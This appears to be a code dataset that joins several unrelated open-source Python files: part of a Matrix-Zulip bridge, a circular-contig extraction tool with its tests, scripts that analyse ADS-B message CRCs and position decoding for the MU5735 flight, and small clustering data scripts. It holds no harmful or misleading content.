client.call_on_each_event,
lambda event: self.on_puppet_event( # pylint: disable=unnecessary-lambda
event
),
apply_markdown=True,
event_types=["message"], # required for narrow
narrow=[["is", "dm"]],
),
)
await self.save()
return profile
def delete_zulip_puppet(self, user_id: "UserID"):
if user_id in self.zulip_puppets:
del self.zulip_puppets[user_id]
if user_id in self.zulip_puppet_user_mxid.inv:
del self.zulip_puppet_user_mxid.inv[user_id]
if user_id in self.zulip_puppet_login:
del self.zulip_puppet_login[user_id]
async def _sync_permissions(self):
# Owner should have the highest permissions (after bot)
self.permissions[self.serv.config["owner"]] = 99
# arbitrary translations of Zulip roles to Matrix permissions
role_permission_mapping = {
100: 95, # owner
200: 80, # administrator
300: 50, # moderator
400: 0, # member
600: 0, # guest
}
for zulip_user_id, user in self.zulip_users.items():
user_id = self.serv.get_mxid_from_zulip_user_id(self, zulip_user_id)
power_level = role_permission_mapping[user["role"]]
self.permissions[user_id] = power_level
rooms = set(self.rooms.values())
rooms.add(self)
rooms.add(self.space)
logging.info(len(rooms))
for room in rooms:
if not isinstance(room, (StreamRoom, OrganizationRoom, SpaceRoom)):
continue
logging.debug(f"Synching permissions in {self.name} - {room.id}")
await room.sync_permissions(self.permissions)
async def _sync_all_room_members(self):
result = self.zulip.get_subscriptions(request={"include_subscribers": True})
if result["result"] != "success":
logging.error(
f"Getting subscriptions for {self.name} failed! Message: {result['msg']}"
)
return
streams = result["subscriptions"]
for stream in streams:
room = self.rooms.get(stream["stream_id"])
if not room or not isinstance(room, StreamRoom):
continue
asyncio.ensure_future(room.sync_zulip_members(stream["subscribers"]))
def get_zulip_user(self, user_id: "ZulipUserID", update_cache: bool = False):
if update_cache or user_id not in self.zulip_users:
result = self.zulip.get_user_by_id(user_id)
if result["result"] != "success":
return None
self.zulip_users[user_id] = result["user"]
return self.zulip_users[user_id]
def get_zulip_user_id_from_mxid(self, mxid: "UserID") -> Optional["ZulipUserID"]:
if self.serv.is_puppet(mxid):
ret = re.search(
rf"@{self.serv.puppet_prefix}{self.name.lower()}{self.serv.puppet_separator}(\d+):{self.serv.server_name}",
mxid,
)
return ret.group(1)
elif mxid in self.zulip_puppet_user_mxid.inv:
return self.zulip_puppet_user_mxid.inv[mxid]
else:
return None
async def backfill_messages(self):
for room in self.rooms.values():
if not isinstance(room, StreamRoom):
continue
if room.max_backfill_amount == 0:
continue
await room.backfill_messages()
for room in self.direct_rooms.values():
await room.backfill_messages()
def on_puppet_event(self, event: dict) -> None:
if event["type"] != "message":
return
self.dm_message(event["message"])
def dm_message(self, message: dict) -> None:
event = {"type": "_dm_message", "message": message}
self._queue.enqueue(event)
async def _flush_event(self, event: dict):
if event["type"] == "_dm_message":
await self.zulip_handler.handle_dm_message(event["message"])
else:
return await super()._flush_event(event)
| 30,920 | Python | .py | 751 | 30.338216 | 123 | 0.589586 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,592 | types.py | GearKite_MatrixZulipBridge/matrixzulipbridge/types.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
from typing import NewType
from mautrix.types import EventID
ZulipTopicName = NewType("ZulipTopicName", str)
ThreadEventID = NewType("ThreadEventID", EventID)
ZulipUserID = NewType("ZulipUserID", str)
ZulipMessageID = NewType("ZulipMessageID", str)
ZulipStreamID = NewType("ZulipStreamID", int)
| 1,081 | Python | .py | 24 | 43.958333 | 74 | 0.790521 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,593 | circular_contig_extractor.py | rrwick_Circular-Contig-Extractor/circular_contig_extractor.py | #!/usr/bin/env python3
"""
Copyright 2024 Ryan Wick ([email protected])
https://github.com/rrwick/Circular-Contig-Extractor
This program is free software: you can redistribute it and/or modify it under the terms of the GNU
General Public License as published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not,
see <https://www.gnu.org/licenses/>.
"""
import argparse
import collections
import gzip
import os
import pathlib
import re
import shutil
import subprocess
import sys
import tempfile
__version__ = '0.1.0'
def get_arguments(args):
parser = MyParser(description='Circular Contig Extractor', add_help=False,
formatter_class=MyHelpFormatter)
positional_args = parser.add_argument_group('Positional arguments')
positional_args.add_argument('input_gfa', type=pathlib.Path,
help='Input assembly graph in GFA format')
clustering_args = parser.add_argument_group('Contig size settings')
clustering_args.add_argument('--min', type=int, default=None,
help='Minimum contig size in bp (default: no minimum size)')
clustering_args.add_argument('--max', type=int, default=None,
help='Maximum contig size in bp (default: no maximum size)')
clustering_args = parser.add_argument_group('Query settings')
clustering_args.add_argument('--query', type=pathlib.Path, default=None,
help='Query reference sequence(s) in FASTA format (default: none)')
clustering_args.add_argument('--mash', type=float, default=0.1,
help='Maximum Mash distance to query sequence')
other_args = parser.add_argument_group('Other')
other_args.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS,
help='Show this help message and exit')
other_args.add_argument('--version', action='version',
version='Circular Contig Extractor v' + __version__,
help="Show program's version number and exit")
args = parser.parse_args(args)
check_args(args)
return args
def main(args=None):
args = get_arguments(args)
contigs, links = load_gfa(args.input_gfa)
contigs = find_circular_contigs(contigs, links)
quit_if_no_contigs_left(contigs)
contigs = trim_overlaps(contigs)
contigs = filter_by_size(contigs, args.min, args.max)
quit_if_no_contigs_left(contigs)
contigs = filter_by_query(contigs, args.query, args.mash)
quit_if_no_contigs_left(contigs)
output_contigs(contigs)
def quit_if_no_contigs_left(contigs):
if not contigs:
sys.exit()
def check_args(args):
if args.min is not None and args.min <= 0:
sys.exit('Error: --min must be greater than 0')
if args.max is not None and args.max <= 0:
sys.exit('Error: --max must be greater than 0')
if args.min is not None and args.max is not None and args.max < args.min:
sys.exit('Error: --max must be greater than or equal to --min')
if args.mash < 0:
sys.exit('Error: --mash must be greater than or equal to 0.0')
if args.mash >= 1:
sys.exit('Error: --mash must be less than 1.0')
if args.query is not None:
check_file_exists(args.query)
query_seqs = list(iterate_fasta(args.query))
if not query_seqs:
sys.exit(f'Error: {args.query} contains no sequences')
def load_gfa(filename):
print(f'\nLoading {filename}:', file=sys.stderr)
contigs, links = [], []
with get_open_func(filename)(filename, 'rt') as gfa_file:
for line in gfa_file:
parts = line.rstrip('\n').split('\t')
if parts[0] == 'S':
contigs.append(parts[1:3])
if parts[0] == 'L':
links.append(parts[1:6])
print(f' {len(contigs)} contig{"" if len(contigs) == 1 else "s"}', file=sys.stderr)
print(f' {len(links)} link{"" if len(links) == 1 else "s"}', file=sys.stderr)
return contigs, links
def find_circular_contigs(contigs, links):
print(f'\nFinding circular contigs:', file=sys.stderr)
circular_links = {}
for seg_a, strand_a, seg_b, strand_b, cigar in links:
if seg_a == seg_b and strand_a == strand_b:
circular_links[seg_a] = cigar
for seg_a, strand_a, seg_b, strand_b, _ in links:
if seg_a != seg_b or strand_a != strand_b:
circular_links.pop(seg_a, None)
circular_links.pop(seg_b, None)
circular_contigs = []
for name, seq in contigs:
if name in circular_links:
circular_contigs.append((name, seq, circular_links[name]))
print(f' {name}: {len(seq):,} bp', file=sys.stderr)
if not circular_contigs:
print(' no circular contigs found\n', file=sys.stderr)
return circular_contigs
def trim_overlaps(contigs):
print(f'\nTrimming overlaps:', file=sys.stderr)
trimmed_contigs = []
for name, seq, cigar in contigs:
print(f' {name}: ', file=sys.stderr, end='')
overlap = get_overlap_from_cigar(cigar)
if overlap is None:
print(f'cannot determine overlap', file=sys.stderr)
elif overlap == 0:
print(f'no overlap', file=sys.stderr)
else:
print(f'trimming {overlap} bp', file=sys.stderr)
trimmed_contigs.append((name, trim_seq(seq, overlap)))
return trimmed_contigs
def get_overlap_from_cigar(cigar):
match = re.match(r'^(\d+)M$', cigar)
return int(match.group(1)) if match else None
def trim_seq(seq, trim_amount):
if trim_amount is None or trim_amount == 0:
return seq
else:
return seq[:-trim_amount]
def filter_by_size(contigs, min_size, max_size):
if min_size is None and max_size is None:
return contigs
print(f'\nFiltering by size:', file=sys.stderr)
if min_size is not None:
contigs = [s for s in contigs if len(s[1]) >= min_size]
if max_size is not None:
contigs = [s for s in contigs if len(s[1]) <= max_size]
for name, seq in contigs:
print(f' {name}: {len(seq):,} bp', file=sys.stderr)
if not contigs:
print(' no contigs satisfy size parameters\n', file=sys.stderr)
return contigs
def filter_by_query(contigs, query_filename, mash_threshold):
if query_filename is None:
return contigs
print(f'\nFiltering by query sequence(s):', file=sys.stderr)
mash_distances = get_all_mash_distances(contigs, query_filename)
closest_distances = {contig_name: sorted(distances)[0]
for contig_name, distances in mash_distances.items()}
matching_contigs = []
for name, seq in contigs:
closest_dist, closest_query = closest_distances[name]
if closest_dist <= mash_threshold:
matching_contigs.append((name, seq))
print(f' {name}: {closest_dist:.5f} Mash distance to {closest_query}', file=sys.stderr)
if not matching_contigs:
print(' no contigs match query sequence(s)\n', file=sys.stderr)
return matching_contigs
def get_all_mash_distances(contigs, query_filename):
mash_distances = collections.defaultdict(list)
with tempfile.TemporaryDirectory() as temp_dir:
query_fasta = pathlib.Path(temp_dir) / 'query.fasta'
contig_fasta = pathlib.Path(temp_dir) / 'contig.fasta'
for query_name, query_seq in iterate_fasta(query_filename):
write_fasta(query_name, query_seq, query_fasta)
for contig_name, contig_seq in contigs:
write_fasta(contig_name, contig_seq, contig_fasta)
dist = get_mash_distance(query_fasta, contig_fasta)
mash_distances[contig_name].append((dist, query_name))
return mash_distances
def write_fasta(name, seq, filename):
with open(filename, 'wt') as f:
f.write(f'>{name}\n')
f.write(f'{seq}\n')
def get_mash_distance(fasta_a, fasta_b):
mash_command = ['mash', 'dist', fasta_a, fasta_b]
distances = []
p = subprocess.Popen(mash_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
stderr = p.stderr.read().strip()
for line in p.stdout:
parts = line.split('\t')
distance = float(parts[2])
distances.append(distance)
if len(distances) != 1:
sys.exit(f'Error: mash dist did not run successfully:\n{stderr}')
assert len(distances) == 1
return distances[0]
def output_contigs(contigs):
print(f'\nOutputting contigs:', file=sys.stderr)
for name, seq in contigs:
print(f' {name}: {len(seq):,} bp', file=sys.stderr)
print(f'>{name}\n{seq}')
print('', file=sys.stderr)
def iterate_fasta(filename):
"""
Takes a FASTA file as input and yields the contents as (name, seq) tuples.
"""
with get_open_func(filename)(filename, 'rt') as fasta_file:
name = ''
sequence = []
for line in fasta_file:
line = line.strip()
if not line:
continue
if line[0] == '>': # Header line = start of new contig
if name:
name_parts = name.split(maxsplit=1)
contig_name = name_parts[0]
yield contig_name, ''.join(sequence)
sequence = []
name = line[1:]
else:
sequence.append(line.upper())
if name:
name_parts = name.split(maxsplit=1)
contig_name = name_parts[0]
yield contig_name, ''.join(sequence)
def check_file_exists(filename):
if filename.is_dir():
sys.exit(f'Error: {filename} is a directory, not a file')
if not filename.is_file():
sys.exit(f'Error: {filename} does not exist')
def get_compression_type(filename):
"""
Attempts to guess the compression (if any) on a file using the first few bytes.
http://stackoverflow.com/questions/13044562
"""
magic_dict = {'gz': (b'\x1f', b'\x8b', b'\x08'),
'bz2': (b'\x42', b'\x5a', b'\x68'),
'zip': (b'\x50', b'\x4b', b'\x03', b'\x04')}
max_len = max(len(x) for x in magic_dict)
unknown_file = open(str(filename), 'rb')
file_start = unknown_file.read(max_len)
unknown_file.close()
compression_type = 'plain'
for file_type, magic_bytes in magic_dict.items():
if file_start.startswith(magic_bytes):
compression_type = file_type
if compression_type == 'bz2':
sys.exit('Error: cannot use bzip2 format - use gzip instead')
if compression_type == 'zip':
sys.exit('Error: cannot use zip format - use gzip instead')
return compression_type
def get_open_func(filename):
if get_compression_type(filename) == 'gz':
return gzip.open
else: # plain text
return open
END_FORMATTING = '\033[0m'
BOLD = '\033[1m'
DIM = '\033[2m'
class MyParser(argparse.ArgumentParser):
"""
This subclass of ArgumentParser changes the error messages, such that if the script is run with
no other arguments, it will display the help text. If there is a different error, it will give
the normal response (usage and error).
"""
def error(self, message):
if len(sys.argv) == 1: # if no arguments were given.
self.print_help(file=sys.stderr)
sys.exit(1)
else:
super().error(message)
class MyHelpFormatter(argparse.HelpFormatter):
def __init__(self, prog):
terminal_width = shutil.get_terminal_size().columns
os.environ['COLUMNS'] = str(terminal_width)
max_help_position = min(max(24, terminal_width // 3), 40)
self.colours = get_colours_from_tput()
super().__init__(prog, max_help_position=max_help_position)
def _get_help_string(self, action):
"""
Override this function to add default values, but only when 'default' is not already in the
help text.
"""
help_text = action.help
if action.default != argparse.SUPPRESS and action.default is not None:
if 'default: DEFAULT' in help_text:
help_text = help_text.replace('default: DEFAULT', f'default: {action.default}')
return help_text
def start_section(self, heading):
"""
Override this method to add bold underlining to section headers.
"""
if self.colours > 1:
heading = BOLD + heading + END_FORMATTING
super().start_section(heading)
def _format_action(self, action):
"""
Override this method to make help descriptions dim.
"""
help_position = min(self._action_max_length + 2, self._max_help_position)
help_width = self._width - help_position
action_width = help_position - self._current_indent - 2
action_header = self._format_action_invocation(action)
if not action.help:
tup = self._current_indent, '', action_header
action_header = '%*s%s\n' % tup
indent_first = 0
elif len(action_header) <= action_width:
tup = self._current_indent, '', action_width, action_header
action_header = '%*s%-*s ' % tup
indent_first = 0
else:
tup = self._current_indent, '', action_header
action_header = '%*s%s\n' % tup
indent_first = help_position
parts = [action_header]
if action.help:
help_text = self._expand_help(action)
help_lines = self._split_lines(help_text, help_width)
first_line = help_lines[0]
if self.colours > 8:
first_line = DIM + first_line + END_FORMATTING
parts.append('%*s%s\n' % (indent_first, '', first_line))
for line in help_lines[1:]:
if self.colours > 8:
line = DIM + line + END_FORMATTING
parts.append('%*s%s\n' % (help_position, '', line))
elif not action_header.endswith('\n'):
parts.append('\n')
for subaction in self._iter_indented_subactions(action):
parts.append(self._format_action(subaction))
return self._join_parts(parts)
def get_colours_from_tput():
try:
return int(subprocess.check_output(['tput', 'colors']).decode().strip())
except (ValueError, subprocess.CalledProcessError, FileNotFoundError, AttributeError):
return 1
if __name__ == '__main__':
main()
| 14,931 | Python | .py | 334 | 36.389222 | 100 | 0.625568 | rrwick/Circular-Contig-Extractor | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,594 | test_circular_contig_extractor.py | rrwick_Circular-Contig-Extractor/test/test_circular_contig_extractor.py | """
This module contains some tests for Circular Contig Extractor. To run them, execute
`python3 -m pytest` from the root Circular Contig Extractor directory.
Copyright 2024 Ryan Wick ([email protected])
https://github.com/rrwick/Circular-Contig-Extractor
This program is free software: you can redistribute it and/or modify it under the terms of the GNU
General Public License as published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not,
see <https://www.gnu.org/licenses/>.
"""
import circular_contig_extractor
import collections
import glob
import gzip
import os
import pathlib
import pytest
import tempfile
def file_dir():
return pathlib.Path(__file__).resolve().parent / 'files'
def test_compression_type_1():
filename = file_dir() / 'uncompressed'
compression_type = circular_contig_extractor.get_compression_type(filename)
assert compression_type == 'plain'
open_func = circular_contig_extractor.get_open_func(filename)
assert open_func == open
def test_compression_type_2():
filename = file_dir() / 'gzipped'
compression_type = circular_contig_extractor.get_compression_type(filename)
assert compression_type == 'gz'
open_func = circular_contig_extractor.get_open_func(filename)
assert open_func == gzip.open
def test_compression_type_3():
filename = file_dir() / 'bzip2ed'
with pytest.raises(SystemExit) as exit_message:
circular_contig_extractor.get_compression_type(filename)
assert 'cannot use bzip2' in str(exit_message.value)
def test_compression_type_4():
filename = file_dir() / 'zipped'
with pytest.raises(SystemExit) as exit_message:
circular_contig_extractor.get_compression_type(filename)
assert 'cannot use zip' in str(exit_message.value)
def test_help_1():
with pytest.raises(SystemExit) as sysexit:
circular_contig_extractor.main(['--help'])
def test_help_2():
with pytest.raises(SystemExit) as sysexit:
circular_contig_extractor.main([])
def test_check_args():
Args = collections.namedtuple('Args', ['in_gfa', 'min', 'max', 'query', 'mash'])
check_args = circular_contig_extractor.check_args
check_args(Args(in_gfa='in', min=None, max=None, query=None, mash=0.1))
check_args(Args(in_gfa='in', min=100, max=None, query=None, mash=0.1))
check_args(Args(in_gfa='in', min=None, max=100, query=None, mash=0.1))
check_args(Args(in_gfa='in', min=None, max=None, query=None, mash=0.9))
with pytest.raises(SystemExit):
check_args(Args(in_gfa='in', min=-100, max=None, query=None, mash=0.1))
with pytest.raises(SystemExit):
check_args(Args(in_gfa='in', min=None, max=-100, query=None, mash=0.1))
with pytest.raises(SystemExit):
check_args(Args(in_gfa='in', min=1000, max=100, query=None, mash=0.1))
with pytest.raises(SystemExit):
check_args(Args(in_gfa='in', min=None, max=None, query=None, mash=2.0))
with pytest.raises(SystemExit):
check_args(Args(in_gfa='in', min=None, max=None, query=None, mash=-0.1))
with pytest.raises(SystemExit):
check_args(Args(in_gfa='in', min=None, max=None, query=pathlib.Path('bad'), mash=0.5))
def test_check_file_exists():
good = file_dir() / 'uncompressed'
bad = file_dir() / 'not_a_file'
directory = pathlib.Path(__file__).resolve().parent
circular_contig_extractor.check_file_exists(good)
with pytest.raises(SystemExit):
circular_contig_extractor.check_file_exists(bad)
with pytest.raises(SystemExit):
circular_contig_extractor.check_file_exists(directory)
def test_load_gfa():
filename = file_dir() / 'graph_1.gfa'
contigs, links = circular_contig_extractor.load_gfa(filename)
assert len(contigs) == 3
assert len(links) == 3
def test_find_circular_contigs_1():
filename = file_dir() / 'graph_1.gfa'
contigs, links = circular_contig_extractor.load_gfa(filename)
circular_contigs = circular_contig_extractor.find_circular_contigs(contigs, links)
assert len(circular_contigs) == 1
assert circular_contigs[0][0] == '2'
def test_find_circular_contigs_2():
filename = file_dir() / 'graph_2.gfa'
contigs, links = circular_contig_extractor.load_gfa(filename)
circular_contigs = circular_contig_extractor.find_circular_contigs(contigs, links)
assert len(circular_contigs) == 0
def test_trim_overlaps():
contigs = [('1', 'ACGATCAGCACT', '0M'),
('2', 'ACGATCAGCACT', '5M'),
('3', 'ACGATCAGCACT', '*')]
trimmed_contigs = circular_contig_extractor.trim_overlaps(contigs)
assert trimmed_contigs == [('1', 'ACGATCAGCACT'), ('2', 'ACGATCA'), ('3', 'ACGATCAGCACT')]
def test_get_overlap_from_cigar():
assert circular_contig_extractor.get_overlap_from_cigar('0M') == 0
assert circular_contig_extractor.get_overlap_from_cigar('123M') == 123
assert circular_contig_extractor.get_overlap_from_cigar('abc') is None
assert circular_contig_extractor.get_overlap_from_cigar('2M1D4M') is None
assert circular_contig_extractor.get_overlap_from_cigar('') is None
def test_trim_seq():
assert circular_contig_extractor.trim_seq('ACACGACTACG', None) == 'ACACGACTACG'
assert circular_contig_extractor.trim_seq('ACACGACTACG', 0) == 'ACACGACTACG'
assert circular_contig_extractor.trim_seq('ACACGACTACG', 1) == 'ACACGACTAC'
assert circular_contig_extractor.trim_seq('ACACGACTACG', 2) == 'ACACGACTA'
assert circular_contig_extractor.trim_seq('ACACGACTACG', 3) == 'ACACGACT'
assert circular_contig_extractor.trim_seq('ACACGACTACG', 4) == 'ACACGAC'
assert circular_contig_extractor.trim_seq('ACACGACTACG', 5) == 'ACACGA'
def test_filter_by_size():
contigs = [('1', 'ACGATC'), ('2', 'ACGATCAGC'), ('3', 'ACGATCAGCACT')]
filtered_contigs = circular_contig_extractor.filter_by_size(contigs, None, None)
assert filtered_contigs == [('1', 'ACGATC'), ('2', 'ACGATCAGC'), ('3', 'ACGATCAGCACT')]
filtered_contigs = circular_contig_extractor.filter_by_size(contigs, 0, 100)
assert filtered_contigs == [('1', 'ACGATC'), ('2', 'ACGATCAGC'), ('3', 'ACGATCAGCACT')]
filtered_contigs = circular_contig_extractor.filter_by_size(contigs, 8, 10)
assert filtered_contigs == [('2', 'ACGATCAGC')]
filtered_contigs = circular_contig_extractor.filter_by_size(contigs, 9, 9)
assert filtered_contigs == [('2', 'ACGATCAGC')]
filtered_contigs = circular_contig_extractor.filter_by_size(contigs, None, 9)
assert filtered_contigs == [('1', 'ACGATC'), ('2', 'ACGATCAGC')]
filtered_contigs = circular_contig_extractor.filter_by_size(contigs, 9, None)
assert filtered_contigs == [('2', 'ACGATCAGC'), ('3', 'ACGATCAGCACT')]
filtered_contigs = circular_contig_extractor.filter_by_size(contigs, 100, 200)
assert filtered_contigs == []
def test_filter_by_query_1():
graph_filename = file_dir() / 'graph_3.gfa'
query_filename = file_dir() / 'query.fasta'
contigs, _ = circular_contig_extractor.load_gfa(graph_filename)
matching_contigs = circular_contig_extractor.filter_by_query(contigs, query_filename, 0.1)
assert len(matching_contigs) == 1
assert matching_contigs[0][0] == '2'
def test_filter_by_query_2():
graph_filename = file_dir() / 'graph_3.gfa'
query_filename = file_dir() / 'query.fasta'
contigs, _ = circular_contig_extractor.load_gfa(graph_filename)
matching_contigs = circular_contig_extractor.filter_by_query(contigs, query_filename, 0.00001)
assert len(matching_contigs) == 0
def test_get_mash_distance():
fasta = file_dir() / 'query.fasta'
empty = file_dir() / 'empty_file'
assert circular_contig_extractor.get_mash_distance(fasta, fasta) == 0.0
with pytest.raises(SystemExit):
assert circular_contig_extractor.get_mash_distance(empty, empty)
def test_write_fasta():
with tempfile.TemporaryDirectory() as temp_dir:
fasta = pathlib.Path(temp_dir) / 'temp.fasta'
circular_contig_extractor.write_fasta('a', 'ACGACTACGATC', fasta)
result = list(circular_contig_extractor.iterate_fasta(fasta))
assert result == [('a', 'ACGACTACGATC')]
| 8,507 | Python | .py | 157 | 49.401274 | 98 | 0.708644 | rrwick/Circular-Contig-Extractor | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,595 | crc_collision.py | ErnestThePoet_MU5735-ADSB-Reveal/crc_collision.py | import pyModeS as pms
# When calculating CRC, AP should be all zeros
df5_2101_template = "00101_{0}_0001001110000_000000000000000000000000"
df5_0463_template = "00101_{0}_0010101010110_000000000000000000000000"
collision_values: dict[str, list[str]] = {}
fs_dr_um_valid_values: list[str] = []
for fs in map(lambda x: bin(x)[2:].zfill(3), range(1 << 3)):
for dr in ("00000", "00001", "00100", "00101"):
for um in map(lambda x: bin(x)[2:].zfill(6), range(1 << 6)):
fs_dr_um_valid_values.append(fs + dr + um)
for fs_dr_um_2101 in fs_dr_um_valid_values:
df5_2101_template_hex = pms.bin2hex(df5_2101_template.format(fs_dr_um_2101))
crc_df5_2101 = pms.crc(df5_2101_template_hex)
for fs_dr_um_0463 in map(lambda x: bin(x)[2:].zfill(14), range(1 << 14)):
df5_0463_template_hex = pms.bin2hex(df5_0463_template.format(fs_dr_um_0463))
crc_df5_0463 = pms.crc(df5_0463_template_hex)
if crc_df5_0463 == crc_df5_2101:
if fs_dr_um_2101 in collision_values:
collision_values[fs_dr_um_2101].append(fs_dr_um_0463)
else:
collision_values[fs_dr_um_2101] = [fs_dr_um_0463]
if len(collision_values) == 0:
print("No collision")
else:
for fs_dr_um_2101 in collision_values:
print(f"Collisions with 2101 where FS,DR,UM={fs_dr_um_2101}:")
for fs_dr_um_0463 in collision_values[fs_dr_um_2101]:
print(f" {fs_dr_um_0463}")
| 1,456 | Python | .py | 28 | 45.285714 | 84 | 0.644366 | ErnestThePoet/MU5735-ADSB-Reveal | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,596 | airborne_position_msg_drop_test.py | ErnestThePoet_MU5735-ADSB-Reveal/airborne_position_msg_drop_test.py | import math
from geopy import distance
import pyModeS as pms
def cpr_mod(a: float, b: float):
res = a % b
if res < 0:
res += b
return res
def generate_adsb_sequence(positions: list[tuple[float, float]]):
MODES_TEMPLATE = f"10001_101_{pms.hex2bin('780DB8')}_{{0}}_000000000000000000000000"
ADSB_TEMPLATE = "01011_00_0_100101110100_0_{0}_{1}_{2}"
even = True
sequence: list[str] = []
for lat, lon in positions:
i = 0 if even else 1
d_lat = 360 / (60 - i)
yz = math.floor(131072 * cpr_mod(lat, d_lat) / d_lat + 0.5)
r_lat = d_lat * (yz / 131072 + math.floor(lat / d_lat))
d_lon = 360 if pms.cprNL(r_lat) - i == 0 else 360 / (pms.cprNL(r_lat) - i)
xz = math.floor(131072 * cpr_mod(lon, d_lon) / d_lon + 0.5)
yz = cpr_mod(yz, 131072)
xz = cpr_mod(xz, 131072)
modes = pms.bin2hex(MODES_TEMPLATE.format(ADSB_TEMPLATE.format(
i, bin(int(yz))[2:].zfill(17), bin(int(xz))[2:].zfill(17))))
modes = modes[:-6] + hex(pms.crc(modes))[2:].upper().zfill(6)
sequence.append(modes)
even = not even
return sequence
actual_positions = [
(23.34635931557985, 110.8665426944272),
(23.34625894779067, 110.8676942564005),
(23.3460993127592, 110.8688379724686),
(23.34595425581612, 110.8699840542241),
(23.34581111111111, 110.8711305555556),
(23.34572208257996, 110.8722959681039),
(23.34561413057375, 110.8734468947545),
(23.34548167343178, 110.8745951079078),
(23.34533321223092, 110.8757400114616),
(23.34516545838654, 110.8768829102285),
]
adsb_sequence = generate_adsb_sequence(actual_positions)
def decode_pos(test_name: str, ignored_msg_indexes: set[int] = None):
print(test_name)
last_even_msg = ""
last_odd_msg = ""
start_index = 1
for i in range(len(adsb_sequence)):
if ignored_msg_indexes and i in ignored_msg_indexes:
continue
if pms.hex2bin(adsb_sequence[i])[53] == "0":
last_even_msg = adsb_sequence[i]
else:
last_odd_msg = adsb_sequence[i]
start_index = i + 1
break
for i in range(start_index, len(adsb_sequence)):
if ignored_msg_indexes and i in ignored_msg_indexes:
continue
if pms.hex2bin(adsb_sequence[i])[53] == "0":
last_even_msg = adsb_sequence[i]
if last_odd_msg == "":
continue
selected_msg = last_odd_msg
else:
last_odd_msg = adsb_sequence[i]
if last_even_msg == "":
continue
selected_msg = last_even_msg
calculated_pos = pms.adsb.airborne_position(selected_msg, adsb_sequence[i], 0, 1)
if i == len(adsb_sequence) - 1:
dist = distance.distance(calculated_pos, actual_positions[i]).m
print(f"C{i + 1}={calculated_pos} D={dist:.03f}m")
print()
return dist
# decode_pos("No dropped messages")
min_dist = 10000
max_dist = 0
min_dist_drop_desc = ""
max_dist_drop_desc = ""
for i in range(1 << 6):
ignored_msg_indexes: set[int] = set()
for j in range(6):
if i & (1 << j):
ignored_msg_indexes.add(j + 3)
test_name = "{}" if len(ignored_msg_indexes) == 0 else str(ignored_msg_indexes)
dist = decode_pos(test_name, ignored_msg_indexes)
if dist > max_dist:
max_dist = dist
max_dist_drop_desc = test_name
if dist < min_dist:
min_dist = dist
min_dist_drop_desc = test_name
print(f"Min dist for C10: {min_dist:.3f}m when dropping {min_dist_drop_desc}")
print(f"Max dist for C10: {max_dist:.3f}m when dropping {max_dist_drop_desc}")
| 3,725 | Python | .py | 94 | 32.170213 | 89 | 0.607341 | ErnestThePoet/MU5735-ADSB-Reveal | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,597 | FiveSpiralData.py | alanxuji_FaithPDP/FiveSpiralData.py | import math
import numpy as np
import matplotlib.pyplot as plt
# save csv
import csv
# python2可以用file替代open
# 写入多行用writerows
tArr = np.arange(2, 4*np.pi, 0.001, dtype='float32')
size = len(tArr)
x = np.zeros(size)
y= np.zeros(size)
phi = [2.1, 2.8, 4.1, 4.8, 6.2]
dataAll = np.zeros((5*size,4),dtype='float32')
plt.rcParams['font.sans-serif'] = ['Times New Roman']
# plt.rcParams['figure.figsize']= (8, 6)
fig = plt.figure(figsize=(12, 12), linewidth=2)
ax = fig.gca()
for axis in ['top', 'bottom', 'left', 'right']:
ax.spines[axis].set_linewidth(2)
plt.title("5Spiral", fontsize=32)
plt.tick_params(width=2, labelsize=28)
index = 0
clusterID = 0
for phi_i in phi:
for i in range(size):
x[i] = -1*tArr[i]/8 * math.cos(tArr[i]+phi_i)
y[i] = -1 * tArr[i] / 8 * math.sin(tArr[i] + phi_i)
dataAll[index]=([index, x[i], y[i], clusterID ])
index += 1
clusterID += 1
plt.scatter(x,y)
with open("data/5Spiral50K.csv", "w", newline ='') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(["Index", "x", "y", "clusterID"])
for i in range(5*size):
writer.writerow([int(dataAll[i,0]),dataAll[i,1], dataAll[i,2], int(dataAll[i,3])])
print("data saved!")
plt.show()
| 1,324 | Python | .py | 38 | 29.473684 | 91 | 0.621951 | alanxuji/FaithPDP | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,598 | FFP-DP-5Spiral.py | alanxuji_FaithPDP/FFP-DP-5Spiral.py | ##### AlanXu @ SKLPBD, GZU. 2024-1-15
##### For Faithful parallelism of Density Peaks Clustering
#### mpiexec -n 14 python FFP-DP-5Spiral.py
import time
from mpi4py import MPI
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from utils import common
